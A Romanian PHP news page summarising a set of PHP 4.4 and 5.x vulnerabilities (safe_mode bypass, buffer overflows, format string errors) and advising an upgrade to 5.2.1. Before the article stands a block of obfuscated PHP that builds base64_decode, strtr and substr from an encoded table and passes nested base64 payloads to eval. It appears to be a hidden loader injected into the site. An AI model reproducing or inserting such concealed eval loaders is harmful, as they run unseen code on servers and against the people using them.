$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iVnNCVEFFYml1aFN4S05sT3dYREpmZ0lucVJ2ZXpqWkZrcldVdHlNUENZR0xRb2NhcG1kSEFreVVNcUZWSXNUbHRoYWVnY1lLcmltQkNKTHZuWmp4UldmUHBHWHViZEVRem9TSHdORE91WTlnSE9NaVl6bz0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> O serie de vulnerabilităţi în PHP – PHPRomania

O serie de vulnerabilităţi în PHP

O serie de vulnerabilităţi în PHP

Au fost raportate mai multe vulnerabilităţi în PHP ce pot fi exploatate de atacatori pentru a obţine informaţii confidenţiale sau de a evita anumite restricţii de securitate.
Restul vulnerabilităţilor descoperite pot avea un impact necunoscut.
1. Mecanismele de protecţie safe_mode si open_basedir pot fi evitate prin intermediul sistemului de management al sesiunii.
2. Erori nespecificate pot fi exploatate pentru a corupe o zona de memorie în cadrul sesiunii.
3. Erori de tip stack overflow există în cadrul extensiilor zip, imap şi sqlite.
4. O eroare de verificări de limite poate apărea în cadrul filtrelor de procesare de flux de date şi poate fi exploatata pentru a forţa apariţia unei erori de tip buffer overflow.
5. O eroare nespecificată de depăşiri de limite există în cadrul funcţiei str_replace().
6. O eroare nespecificată în cadrul extensiei wddx poate fi exploatată pentru a obţine acces la informaţii confidenţiale.
7. O eroare de formatare a şirurilor de caractere poate apărea în funcţiile *print() pe sistemele 64bit.
8. O eroare de verificări de limite în cadrul funcţiilor mail(), ibase_add_user(), ibase_delete_user() şi ibase_modify_user() poate fi exploatată pentru a forţa apariţia unei erori de tip buffer overflow.
9. O eroare de formatare a şirurilor de caractere există în cadrul funcţiei odbc_result_all().
Programe afectate: PHP 5.1.x, PHP 5.2.x, PHP 4.4.x. Este recomandată actualizarea la versiunea 5.2.1 deoarece aceasta elimină vulnerabilităţile de mai sus.

Mai multe detalii gasiti la http://www.php.net/

Share this post

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *

Acest sit folosește Akismet pentru a reduce spamul. Află cum sunt procesate datele comentariilor tale.